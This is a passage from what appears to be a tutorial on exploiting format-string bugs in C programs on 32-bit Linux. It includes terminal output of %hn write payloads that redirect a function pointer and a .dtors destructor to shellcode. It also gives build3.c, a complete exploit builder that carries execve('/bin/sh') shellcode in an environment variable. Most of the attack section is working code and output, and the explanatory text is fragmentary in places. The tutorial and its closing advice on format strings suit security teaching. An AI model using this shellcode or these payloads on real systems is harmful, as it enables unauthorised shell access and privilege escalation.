>>cp build2 bui2 >>./bui2 0xbffff634 3 Calling ./bui2 ... adr : -1073744332 (bffff634) val : -1073744156 (bffff6e4) valh: 49151 (bfff) vall: 63204 (f6e4) [6öÿ¿4öÿ¿%.49143x%3$hn%.14053x%4$hn] (34) Calling ./vuln ... sc = 0xbffff891 adr : -1073744332 (bffff634) val : -1073743727 (bffff891) valh: 49151 (bfff) vall: 63633 (f891) [6öÿ¿4öÿ¿%.49143x%3$hn%.14482x%4$hn] (34) 0 0xbffff867 1 0xbffff86e 2 0xbffff891 3 0xbffff8bf 4 0xbffff8ca helloWorld() = 0x80486c4 accessForbidden() = 0x80486e8 before : ptrf() = 0x80486c4 (0xbffff634) buffer = [6öÿ¿4öÿ¿0000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000 000000000000000] (127) after : ptrf() = 0xbffff891 (0xbffff634) bash$
Won again : that works much better that way ;-) The eggshell
    is in the stack and we changed the address pointed to by
    ptrf to have it point to our shellcode. Of course, it
    can happen only if the stack is executable.
But we have seen that format strings allow us to write anywhere
    : let's add a destructor to our program in the section
    .dtors:
>>objdump -s -j .dtors vuln vuln: file format elf32-i386 Contents of section .dtors: 80498c0 ffffffff 00000000 ........ >>./bui2 80498c4 3 Calling ./bui2 ... adr : 134518980 (80498c4) val : -1073744156 (bffff6e4) valh: 49151 (bfff) vall: 63204 (f6e4) [ÆÄ%.49143x%3$hn%.14053x%4$hn] (34) Calling ./vuln ... sc = 0xbffff894 adr : 134518980 (80498c4) val : -1073743724 (bffff894) valh: 49151 (bfff) vall: 63636 (f894) [ÆÄ%.49143x%3$hn%.14485x%4$hn] (34) 0 0xbffff86a 1 0xbffff871 2 0xbffff894 3 0xbffff8c2 4 0xbffff8ca helloWorld() = 0x80486c4 accessForbidden() = 0x80486e8 before : ptrf() = 0x80486c4 (0xbffff634) buffer = [ÆÄ000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000 0000000000000000] (127) after : ptrf() = 0x80486c4 (0xbffff634) Welcome in "helloWorld" bash$ exit exit >>
Here, no coredump is created while quitting our
    destructor. This is because our shellcode contains an
    exit(0) call.
In conclusion as a last gift, here is build3.c that
    also gives a shell, but  passed through an environment
    variable:
/* build3.c */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
char* build(unsigned int addr, unsigned int value, unsigned int where)
{
  //Même fonction que dans build.c
}
int main(int argc, char **argv) {
  char **env;
  char **arg;
  unsigned char *buf;
  unsigned char shellcode[] =
     "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
      "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
       "\x80\xe8\xdc\xff\xff\xff/bin/sh";
  if (argc == 3) {
    fprintf(stderr, "Calling %s ...\n", argv[0]);
    buf = build(strtoul(argv[1], NULL, 16),  /* adresse */
        &shellcode,
        atoi(argv[2]));              /* offset */
    
    fprintf(stderr, "%d\n", strlen(buf));
    fprintf(stderr, "[%s] (%d)\n", buf, strlen(buf));
    printf("%s",  buf);
    arg = (char **) malloc(sizeof(char *) * 3);
    arg[0]=argv[0];
    arg[1]=buf;
    arg[2]=NULL;
    env = (char **) malloc(sizeof(char *) * 4);
    env[0]=&shellcode;
    env[1]=argv[1];
    env[2]=argv[2];
    env[3]=NULL;
    execve(argv[0],arg,env);
  } else 
  if(argc==2) {
    fprintf(stderr, "Calling ./vuln ...\n");
    fprintf(stderr, "sc = %p\n", environ[0]);
    buf = build(strtoul(environ[1], NULL, 16),  /* adresse */
        environ[0],
        atoi(environ[2]));              /* offset */
    
    fprintf(stderr, "%d\n", strlen(buf));
    fprintf(stderr, "[%s] (%d)\n", buf, strlen(buf));
    printf("%s",  buf);
    arg = (char **) malloc(sizeof(char *) * 3);
    arg[0]=argv[0];
    arg[1]=buf;
    arg[2]=NULL;
    execve("./vuln",arg,environ);
  }
    
  return 0;
}
    Once again, since this environment is in the stack, we need to
    take care not to modify the memory (i.e. changing the position
    of the variables and arguments). The binary's name must 
    contain the same number of characters as the name of vulnerable
    program vuln.
Here, we choose to use the global variable extern char
    **environ to set the values we need:
environ[0]: contains shellcode;environ[1]: contains the address where we expect
      to write;environ[2]: contains the offset."%s" when function such as
    printf(), syslog(), ..., are called. If
    you really can't avoid it, then you have to check the input given by the user
    very carefully. 
    exec*() trick),
    his encouragements ... but also for his article on format bugs
    which caused, in addition to our interest in the question,
    intense cerebral agitation ;-)